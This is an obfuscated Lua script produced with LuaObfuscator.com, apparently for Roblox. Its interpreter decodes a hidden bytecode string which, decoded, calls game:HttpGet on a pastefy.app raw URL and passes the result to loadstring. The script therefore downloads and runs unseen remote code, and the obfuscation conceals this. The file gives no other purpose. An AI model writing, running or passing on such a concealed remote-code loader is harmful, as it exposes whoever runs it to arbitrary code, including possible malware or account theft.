--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v101=v5(v82,v19);v19=nil;return v101;else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(2^(v32-(1 -0))))%((4 -(879 -(282 + 595)))^(((v33-1) -(v32-(620 -(555 + 64)))) + ((2569 -(1523 + 114)) -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=2^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * 256) + v36 ;end if (v35==((1245 + 25) -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + ((2 + 6) -6) ;v35=118 -(32 + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -((1242 -(87 + 263)) + 65)) );v18=v18 + 4 ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -(55782 -(67 + 113)))) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,2 -1 ,(806 -(368 + 423)) + 5 ) * ((7 -(15 -10))^32)) + v42 ;local v46=v20(v43,21,983 -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -0)) and  -(1 + 0)) or 1 ;if (v46==(997 -(915 + 82))) then if (v45==(0 -0)) then return v47 * (0 + (18 -(10 + 8))) ;else v46=1;v44=0 -0 ;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 -0)) and (v47 * ((1 -0)/((0 -0) + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -(1236 -(416 + 26))) ) * (v44 + (v45/((2 + 0)^52))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=1, #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 438 -(262 + 176) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51~=3) then else for v90= #"!",v23() do local v91=(function() return 1721 -(345 + 1376) ;end)();local v92=(function() return;end)();while true do if (v91~=0) then else v92=(function() return v21();end)();if (v20(v92, #":", #"!")==(688 -(198 + 490))) then local v112=(function() return 0 -0 ;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v112==(6 -3)) then if (v20(v114, #"xnx", #"asd")== #"}") then v115[ #"0836"]=(function() return v58[v115[ #"asd1"]];end)();end v53[v90]=(function() return v115;end)();break;end if (v112==1) then local v138=(function() return 0;end)();while true do if ((1206 -(696 + 510))==v138) then v115=(function() return {v22(),v22(),nil,nil};end)();if (v113==(1262 -(1091 + 171))) then local v180=(function() return 0 + 0 ;end)();local v181=(function() return;end)();while true do if (0~=v180) then else v181=(function() return 0 -0 ;end)();while true do if (v181==(0 -0)) then v115[ #"gha"]=(function() return v22();end)();v115[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v113== #" ") then v115[ #"asd"]=(function() return v23();end)();elseif (v113==(376 -(123 + 251))) then v115[ #"asd"]=(function() return v23() -(2^(79 -63)) ;end)();elseif (v113~= #"xnx") then else local v189=(function() return 0;end)();local v190=(function() return;end)();while true do if (v189==(698 -(208 + 490))) then v190=(function() return 0 + 0 ;end)();while true do if (v190==(0 + 0)) then v115[ #"nil"]=(function() return v23() -((838 -(660 + 176))^(2 + 14)) ;end)();v115[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v138=(function() return 1;end)();end if (v138==1) then v112=(function() return 2;end)();break;end end end if (0==v112) then local v139=(function() return 0;end)();while true do if (v139~=(203 -(14 + 188))) then else v112=(function() return 1;end)();break;end if (v139~=0) then else v113=(function() return v20(v92,677 -(534 + 141) , #"91(");end)();v114=(function() return v20(v92, #"asd1",3 + 3 );end)();v139=(function() return 1;end)();end end end if ((2 + 0)==v112) then if (v20(v114, #"}", #">")== #"]") then v115[2 + 0 ]=(function() return v58[v115[2]];end)();end if (v20(v114,2,3 -1 )~= #"\\") then else v115[ #"xxx"]=(function() return v58[v115[ #"91("]];end)();end v112=(function() return 3;end)();end end end break;end end end for v93= #"~",v23() do v54,v93,v28=(function() return v52(v54,v93,v28);end)();end return v56;end if (v51~=(0 -0)) then else local v88=(function() return 0 -0 ;end)();while true do if (v88==(0 + 0)) then v52=(function() return function(v107,v108,v109) local v110=(function() return 0;end)();local v111=(function() return;end)();while true do if (0==v110) then v111=(function() return 0;end)();while true do if (v111==(0 + 0)) then local v144=(function() return 396 -(115 + 281) ;end)();local v145=(function() return;end)();while true do if (v144~=(0 -0)) then else v145=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v145) then v107[v108-#"{" ]=(function() return v109();end)();return v107,v108,v109;end end break;end end end end break;end end end;end)();v53=(function() return {};end)();v88=(function() return 3 -2 ;end)();end if (v88==(868 -(550 + 317))) then v54=(function() return {};end)();v51=(function() return 1 -0 ;end)();break;end end end if (v51==(1 -0)) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v51=(function() return 5 -3 ;end)();end if (v51~=2) then else local v89=(function() return 285 -(134 + 151) ;end)();while true do if (v89==(1665 -(970 + 695))) then v58=(function() return {};end)();for v102= #"!",v57 do local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103==0) then local v116=(function() return 1990 -(582 + 1408) ;end)();while true do if (v116==(3 -2)) then v103=(function() return 1 -0 ;end)();break;end if (v116==(0 -0)) then v104=(function() return 1824 -(1195 + 629) ;end)();v105=(function() return nil;end)();v116=(function() return 1;end)();end end end if (v103==1) then v106=(function() return nil;end)();while true do if (v104~=(0 -0)) then else v105=(function() return v21();end)();v106=(function() return nil;end)();v104=(function() return 242 -(187 + 54) ;end)();end if (v104==1) then if (v105== #"!") then v106=(function() return v21()~=0 ;end)();elseif (v105==(782 -(162 + 618))) then v106=(function() return v24();end)();elseif (v105== #"asd") then v106=(function() return v25();end)();end v58[v102]=(function() return v106;end)();break;end end break;end end end v89=(function() return 1;end)();end if (v89==1) then v56[ #"gha"]=(function() return v21();end)();v51=(function() return 3;end)();break;end end end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[(7 -4) + 0 ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0 -0 ,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 + 0 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + (1637 -((1953 -(361 + 219)) + 263)) ;local v79;local v80;while true do local v87=1000 -((771 -(53 + 267)) + 549) ;while true do if (v87==(1 + 0)) then if (v80<=(4 -1)) then if ((v80<=(1 -0)) or (2874<2181)) then if (v80==(1384 -(746 + 638))) then v77[v79[1 + 1 ]]();else local v117=0 -0 ;local v118;local v119;while true do if (v117==1) then v77[v118 + (342 -(50 + 168 + 123)) ]=v119;v77[v118]=v119[v79[1585 -(1535 + 46) ]];break;end if (v117==(0 + (413 -(15 + 398)))) then v118=v79[1 + 1 ];v119=v77[v79[(1545 -(18 + 964)) -(306 + 254) ]];v117=(3 -2) + 0 ;end end end elseif ((v80==(3 -1)) or (2689<=343)) then do return;end else local v120=1467 -(899 + 568) ;local v121;local v122;local v123;local v124;while true do if ((0 + 0)==v120) then v121=v79[(3 + 1) -(2 + 0) ];v122,v123=v70(v77[v121](v13(v77,v121 + (604 -(268 + 335)) ,v79[853 -(20 + 830) ])));v120=291 -(47 + 13 + 230) ;end if (v120==1) then v72=(v123 + v121) -(573 -((552 -(116 + 10)) + 146)) ;v124=0 + 0 + 0 ;v120=1458 -(282 + 1174) ;end if (((813 -(569 + (980 -(542 + 196))))==v120) or (1869==2009)) then for v175=v121,v72 do local v176=0 -0 ;while true do if ((v176==(0 + 0)) or (3546<2322)) then v124=v124 + 1 ;v77[v175]=v122[v124];break;end end end break;end end end elseif (v80<=(1029 -(706 + 318))) then if (v80==(1255 -(721 + 530))) then v77[v79[1273 -((2025 -1080) + 326) ]]=v61[v79[3]];else local v127=0 -0 ;local v128;local v129;local v130;local v131;local v132;while true do if ((0 + 0)==v127) then v128=nil;v129,v130=nil;v131=nil;v132=nil;v127=1;end if (v127==(702 -(271 + 429))) then v71=v71 + 1 + 0 ;v79=v67[v71];v132=v79[2];v131=v77[v79[1503 -(1408 + 92) ]];v127=1089 -(461 + 625) ;end if ((1292 -(993 + 87 + 208))==v127) then v77[v79[1 + 1 + 0 ]]=v79[1174 -(151 + 267 + 753) ];v71=v71 + (2 -1) + (0 -0) ;v79=v67[v71];v132=v79[(1552 -(1126 + 425)) + 1 ];v127=2 + 3 ;end if (v127==(1 + 2)) then v77[v132 + 1 ]=v131;v77[v132]=v131[v79[533 -(406 + 123) ]];v71=v71 + (1770 -(1749 + (425 -(118 + 287)))) ;v79=v67[v71];v127=1 + 3 ;end if ((v127==(1323 -(1249 + 73))) or (2082==4773)) then v77[v79[1 + 1 ]]=v61[v79[1148 -(466 + 679) ]];v71=v71 + ((7 -5) -1) ;v79=v67[v71];v77[v79[5 -(1124 -(118 + 1003)) ]]=v61[v79[1903 -(106 + 1794) ]];v127=1 + 1 ;end if ((2 + (11 -7))==v127) then v71=v71 + (2 -1) ;v79=v67[v71];v132=v79[5 -(380 -(142 + 235)) ];v77[v132]=v77[v132](v13(v77,v132 + (115 -((18 -14) + 110)) ,v72));v127=591 -(57 + 527) ;end if (v127==(2 + 5)) then v71=v71 + 1 ;v79=v67[v71];v77[v79[1429 -(41 + 1386) ]]();v71=v71 + (104 -(17 + 86)) ;v127=6 + 2 ;end if ((3244>1055) and (v127==(11 -6))) then v129,v130=v70(v77[v132](v13(v77,v132 + (2 -1) ,v79[3])));v72=(v130 + v132) -(167 -(122 + 44)) ;v128=0 -0 ;for v177=v132,v72 do v128=v128 + (3 -2) ;v77[v177]=v129[v128];end v127=5 + 1 ;end if (v127==(2 + 6)) then v79=v67[v71];do return;end break;end end end elseif ((v80>6) or (3313<=1778)) then v77[v79[3 -1 ]]=v79[3];else local v135=65 -(30 + (1012 -(553 + 424))) ;local v136;while true do if (v135==(0 + 0)) then v136=v79[1259 -(1043 + 214) ];v77[v136]=v77[v136](v13(v77,v136 + 1 ,v72));break;end end end v71=v71 + (3 -2) ;break;end if (v87==(1212 -(323 + 889))) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F614876504F442Q6F2F72617700083Q0012053Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
